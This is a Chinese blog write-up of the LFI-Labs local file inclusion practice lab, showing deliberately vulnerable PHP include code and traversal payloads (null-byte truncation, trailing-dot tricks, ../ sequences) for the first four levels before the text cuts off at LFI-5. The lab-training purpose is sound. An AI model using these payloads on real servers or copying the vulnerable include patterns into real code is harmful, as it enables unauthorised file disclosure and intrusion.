文件包含漏洞靶场练习

Lfi-Labs

说明

该环境为phpstudy搭建,在网站根目录下存在phpinfo.php;以此为例。

LFI-1

源码:

<?php
include($_GET["page"]);
?>

payload:

?page=phpinfo.php

发现并没用成功,使用 ../ 返回上一级目录
在这里插入图片描述

LFI-2

源码:

<?php
include("includes/".$_GET['library'].".php"); 
?>

这里给输入的文件包含变量都添加了.php后缀。
例:输入phpinfo.php,会变成phpinfo.php.php;这个文件显然不存在。
这里采用%00截断。

payload:

?library=../../phpinfo.php%00

使用%00截断注意的问题:

(1)php版本小于5.3.4。
(2)php的magic_quotes_gpc为OFF状态。

如果两者都满足,还不成功,可以使用burpsuite抓包重放:

但是,我这里还是不行,裂开。

LFI-3

源码:

<?php

if (substr($_GET['file'], -4, 4) != '.php')
 echo file_get_contents($_GET['file']);
else
 echo 'You are not allowed to see source files!'."\n";
?>

这里审计一下,输入参数的最后四位不能是.php
这里利用Windows环境下的特性:在设置文件后缀名时,如果使用后缀名中包含 . 会自动省略。

所以,payload:

?file=../../phpinfo.php.

LFI-4

源码:

<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

使用addslashes()函数对参数进行了过滤:

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是:

单引号(’)
双引号(")
反斜杠(\)
NULL

但是这道题会在末尾自动添加.php的后缀。

payload:

?class=../../../../../phpinfo

LFI-5

源码:

<?php

   $file = str_replace('../', '', $_GET['file']);
   if
  • 2
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值